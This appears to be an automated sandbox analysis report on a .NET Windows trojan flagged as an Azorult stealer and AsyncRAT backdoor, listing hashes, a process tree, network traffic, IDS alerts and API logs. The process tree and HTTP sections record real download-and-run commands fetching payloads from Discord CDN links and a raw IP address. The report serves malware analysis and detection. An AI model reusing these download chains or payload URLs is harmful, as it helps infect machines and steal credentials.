Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 31, 2021, 1:26 p.m.	July 31, 2021, 1:59 p.m.

Size	98.0KB
Type	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`08ddca87b625734e0028a89fd4ec7247`
SHA256	`6da210965cd769856bbcb8bb501abf25c832f0f6a70e73240436629ce6362fa9`
CRC32	`CE5EAD68`
ssdeep	`1536:zW3LNmocewYT2VvJTX4kOBJFqUYmbfe7vBuvUyyedQ834qCxXsECG6ijoigX:Cxmoc5bIJ4UF8Bucyzd9SnA`
Yara	Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult OS_Processor_Check_Zero - OS Processor Check Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) PE_Header_Zero - PE File Signature Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

@sc4lly1337.exe "C:\Users\test22\AppData\Local\Temp\@sc4lly1337.exe"
2032
- mine.exe "C:\Users\test22\AppData\Local\Temp\mine.exe"
  2512
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe"
    2692
    - extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
      2876
    - extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
      2984
    - extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe" "welldone.exe" "" "" "" "" "" ""
      3064
    - welldone.exe welldone.exe
      2360
    - extd.exe C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
      1164
- clip.exe "C:\Users\test22\AppData\Local\Temp\clip.exe"
  2576
  - cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe"
    2712
    - extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
      2908
    - extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
      2964
    - extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe" "clo.exe" "" "" "" "" "" ""
      1716
    - clo.exe clo.exe
      300
      - clo.exe C:\Users\test22\AppData\Local\Temp\2741\clo.exe
        2472
    - extd.exe C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
      2484

Name	Response	Post-Analysis Lookup
ocsp.digicert.com	CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
api.ip.sb	CNAME api.ip.sb.cdn.cloudflare.net A 104.26.13.31 A 104.26.12.31 A 172.67.75.172	104.26.13.31
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.129.233

IP Address	Status	Action
117.18.237.29	Active	Moloch
162.159.129.233	Active	Moloch
162.159.130.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.75.172	Active	Moloch
45.137.190.166	Active	Moloch
95.217.159.87	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49163 -> 172.67.75.172:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49172 -> 45.137.190.166:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 45.137.190.166:80 -> 192.168.56.102:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.137.190.166:80 -> 192.168.56.102:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.137.190.166:80 -> 192.168.56.102:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.102:49172 -> 45.137.190.166:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 95.217.159.87:4348 -> 192.168.56.102:49161	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 45.137.190.166:80 -> 192.168.56.102:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 45.137.190.166:80 -> 192.168.56.102:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 95.217.159.87:4348 -> 192.168.56.102:49161	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode
TCP 95.217.159.87:4348 -> 192.168.56.102:49161	2221010	SURICATA HTTP unable to match response to request	Generic Protocol Command Decode

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49163 172.67.75.172:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e
TLS 1.2 192.168.56.102:49190 162.159.130.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78
TLS 1.2 192.168.56.102:49189 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (14 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2021, 1:26 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:26 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffsf console_handle: 0x0000000000000007	1	1
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffff console_handle: 0x0000000000000007	1	1
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffsf console_handle: 0x0000000000000007	1	1
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffff console_handle: 0x0000000000000007	1	1
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: A subdirectory or file C:\Users\test22\AppData\Local\Temp\2741 already exists. console_handle: 0x000000000000000b	1	1

Uses Windows APIs to generate a cryptographic key (12 events)

Time & API	Arguments	Status	Return
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008301f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008301f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00830278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d1180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d1180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d0fc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d1640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d16c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:26 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x008d16c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007530c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00753148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00753148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2021, 1:26 p.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 31, 2021, 1:26 p.m.	stacktrace: 0x8e812a 0x8e80a7 0x8e1942 0x8e085c 0x8e0070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a72652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a8264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a82e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73b374ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73b37610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73bc1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73bc1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73bc1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73bc416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7411f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743a7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743a4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8e81b9 registers.esp: 4189708 registers.edi: 36184944 registers.eax: 0 registers.ebp: 4189732 registers.edx: 8461600 registers.ebx: 35201860 registers.esi: 36185124 registers.ecx: 0	1	0	0
__exception__ July 31, 2021, 1:27 p.m.	stacktrace: 0x7fe92e871e2 0x7fe92e800de CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef253f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef253f242 CoUninitializeEE+0x4f7a7 GetMetaDataInternalInterface-0x27f75 clr+0x5294b @ 0x7fef254294b CoUninitializeEE+0x4f782 GetMetaDataInternalInterface-0x27f9a clr+0x52926 @ 0x7fef2542926 CoUninitializeEE+0x4fece GetMetaDataInternalInterface-0x2784e clr+0x53072 @ 0x7fef2543072 CoUninitializeEE+0x4fdae GetMetaDataInternalInterface-0x2796e clr+0x52f52 @ 0x7fef2542f52 CoUninitializeEE+0x4f67f GetMetaDataInternalInterface-0x2809d clr+0x52823 @ 0x7fef2542823 NGenCreateNGenWorker+0x4875 _AxlPublicKeyBlobToPublicKeyToken-0x42997 clr+0x2142d9 @ 0x7fef27042d9 getJit-0xc697 clrjit+0x94b49 @ 0x7fef31a4b49 getJit-0xc67a clrjit+0x94b66 @ 0x7fef31a4b66 getJit-0x4d446 clrjit+0x53d9a @ 0x7fef3163d9a getJit-0x4d52d clrjit+0x53cb3 @ 0x7fef3163cb3 getJit-0x86719 clrjit+0x1aac7 @ 0x7fef312aac7 getJit-0x81eca clrjit+0x1f316 @ 0x7fef312f316 getJit-0x8057b clrjit+0x20c65 @ 0x7fef3130c65 getJit-0x805da clrjit+0x20c06 @ 0x7fef3130c06 getJit-0x9b4b9 clrjit+0x5d27 @ 0x7fef3115d27 getJit-0x89eb5 clrjit+0x1732b @ 0x7fef312732b PreBindAssemblyEx+0x1d9fa CreateHistoryReader-0x5526a clr+0x1207ee @ 0x7fef26107ee PreBindAssemblyEx+0x1d94b CreateHistoryReader-0x55319 clr+0x12073f @ 0x7fef261073f PreBindAssemblyEx+0x1d83a CreateHistoryReader-0x5542a clr+0x12062e @ 0x7fef261062e PreBindAssemblyEx+0x1d718 CreateHistoryReader-0x5554c clr+0x12050c @ 0x7fef261050c StrongNameTokenFromPublicKey+0x893a SetRuntimeInfo-0x33006 clr+0x9e88a @ 0x7fef258e88a CoUninitializeEE+0x4d7cd GetMetaDataInternalInterface-0x29f4f clr+0x50971 @ 0x7fef2540971 CoUninitializeEE+0x4cd27 GetMetaDataInternalInterface-0x2a9f5 clr+0x4fecb @ 0x7fef253fecb DllRegisterServerInternal-0xcc6 clr+0x24da @ 0x7fef24f24da CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef253f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef253f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef253f30b _CorExeMain+0x335c ClrCreateManagedInstance-0x15ae4 clr+0x1e721c @ 0x7fef26d721c _CorExeMain+0x3ab6 ClrCreateManagedInstance-0x1538a clr+0x1e7976 @ 0x7fef26d7976 _CorExeMain+0x39b0 ClrCreateManagedInstance-0x15490 clr+0x1e7870 @ 0x7fef26d7870 _CorExeMain+0x3526 ClrCreateManagedInstance-0x1591a clr+0x1e73e6 @ 0x7fef26d73e6 _CorExeMain+0x347e ClrCreateManagedInstance-0x159c2 clr+0x1e733e @ 0x7fef26d733e _CorExeMain+0x14 ClrCreateManagedInstance-0x18e2c clr+0x1e3ed4 @ 0x7fef26d3ed4 _CorExeMain+0x5d CLRCreateInstance-0x2bd3 mscoreei+0x74e5 @ 0x7fef32d74e5 _CorExeMain+0x69 ND_RU1-0x1707 mscoree+0x5b21 @ 0x7fef3375b21 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521 exception.instruction_r: 80 3b 00 48 8b cb e8 c3 f9 4d 5e 4c 8b e0 33 ff exception.instruction: cmp byte ptr [rbx], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe92e871e2 registers.r14: 0 registers.r15: 0 registers.rcx: 45493480 registers.rsi: 0 registers.r10: 8789966601320 registers.rbx: 0 registers.rsp: 5111472 registers.r11: 5095936 registers.r8: 8791569501429 registers.r9: 1 registers.rdx: 5108928 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 31, 2021, 1:26 p.m.

stacktrace:

0x8e812a
0x8e80a7
0x8e1942
0x8e085c
0x8e0070
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a72652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a8264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a82e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73b374ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73b37610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73bc1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73bc1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73bc1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73bc416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7411f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743a7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743a4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8e81b9
registers.esp: 4189708
registers.edi: 36184944
registers.eax: 0
registers.ebp: 4189732
registers.edx: 8461600
registers.ebx: 35201860
registers.esi: 36185124
registers.ecx: 0

__exception__

July 31, 2021, 1:27 p.m.

stacktrace:

0x7fe92e871e2
0x7fe92e800de
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef253f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef253f242
CoUninitializeEE+0x4f7a7 GetMetaDataInternalInterface-0x27f75 clr+0x5294b @ 0x7fef254294b
CoUninitializeEE+0x4f782 GetMetaDataInternalInterface-0x27f9a clr+0x52926 @ 0x7fef2542926
CoUninitializeEE+0x4fece GetMetaDataInternalInterface-0x2784e clr+0x53072 @ 0x7fef2543072
CoUninitializeEE+0x4fdae GetMetaDataInternalInterface-0x2796e clr+0x52f52 @ 0x7fef2542f52
CoUninitializeEE+0x4f67f GetMetaDataInternalInterface-0x2809d clr+0x52823 @ 0x7fef2542823
NGenCreateNGenWorker+0x4875 _AxlPublicKeyBlobToPublicKeyToken-0x42997 clr+0x2142d9 @ 0x7fef27042d9
getJit-0xc697 clrjit+0x94b49 @ 0x7fef31a4b49
getJit-0xc67a clrjit+0x94b66 @ 0x7fef31a4b66
getJit-0x4d446 clrjit+0x53d9a @ 0x7fef3163d9a
getJit-0x4d52d clrjit+0x53cb3 @ 0x7fef3163cb3
getJit-0x86719 clrjit+0x1aac7 @ 0x7fef312aac7
getJit-0x81eca clrjit+0x1f316 @ 0x7fef312f316
getJit-0x8057b clrjit+0x20c65 @ 0x7fef3130c65
getJit-0x805da clrjit+0x20c06 @ 0x7fef3130c06
getJit-0x9b4b9 clrjit+0x5d27 @ 0x7fef3115d27
getJit-0x89eb5 clrjit+0x1732b @ 0x7fef312732b
PreBindAssemblyEx+0x1d9fa CreateHistoryReader-0x5526a clr+0x1207ee @ 0x7fef26107ee
PreBindAssemblyEx+0x1d94b CreateHistoryReader-0x55319 clr+0x12073f @ 0x7fef261073f
PreBindAssemblyEx+0x1d83a CreateHistoryReader-0x5542a clr+0x12062e @ 0x7fef261062e
PreBindAssemblyEx+0x1d718 CreateHistoryReader-0x5554c clr+0x12050c @ 0x7fef261050c
StrongNameTokenFromPublicKey+0x893a SetRuntimeInfo-0x33006 clr+0x9e88a @ 0x7fef258e88a
CoUninitializeEE+0x4d7cd GetMetaDataInternalInterface-0x29f4f clr+0x50971 @ 0x7fef2540971
CoUninitializeEE+0x4cd27 GetMetaDataInternalInterface-0x2a9f5 clr+0x4fecb @ 0x7fef253fecb
DllRegisterServerInternal-0xcc6 clr+0x24da @ 0x7fef24f24da
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef253f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef253f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef253f30b
_CorExeMain+0x335c ClrCreateManagedInstance-0x15ae4 clr+0x1e721c @ 0x7fef26d721c
_CorExeMain+0x3ab6 ClrCreateManagedInstance-0x1538a clr+0x1e7976 @ 0x7fef26d7976
_CorExeMain+0x39b0 ClrCreateManagedInstance-0x15490 clr+0x1e7870 @ 0x7fef26d7870
_CorExeMain+0x3526 ClrCreateManagedInstance-0x1591a clr+0x1e73e6 @ 0x7fef26d73e6
_CorExeMain+0x347e ClrCreateManagedInstance-0x159c2 clr+0x1e733e @ 0x7fef26d733e
_CorExeMain+0x14 ClrCreateManagedInstance-0x18e2c clr+0x1e3ed4 @ 0x7fef26d3ed4
_CorExeMain+0x5d CLRCreateInstance-0x2bd3 mscoreei+0x74e5 @ 0x7fef32d74e5
_CorExeMain+0x69 ND_RU1-0x1707 mscoree+0x5b21 @ 0x7fef3375b21
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521

exception.instruction_r: 80 3b 00 48 8b cb e8 c3 f9 4d 5e 4c 8b e0 33 ff
exception.instruction: cmp byte ptr [rbx], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe92e871e2
registers.r14: 0
registers.r15: 0
registers.rcx: 45493480
registers.rsi: 0
registers.r10: 8789966601320
registers.rbx: 0
registers.rsp: 5111472
registers.r11: 5095936
registers.r8: 8791569501429
registers.r9: 1
registers.rdx: 5108928
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.137.190.166/mine.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.137.190.166/clip.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/geoip
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe

Performs some HTTP requests (6 events)

request	GET http://45.137.190.166/mine.exe
request	GET http://45.137.190.166/clip.exe
request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
request	GET https://api.ip.sb/geoip
request	GET https://cdn.discordapp.com/attachments/868908533897363470/870626065511501945/welldone.exe
request	GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00425000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00427000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
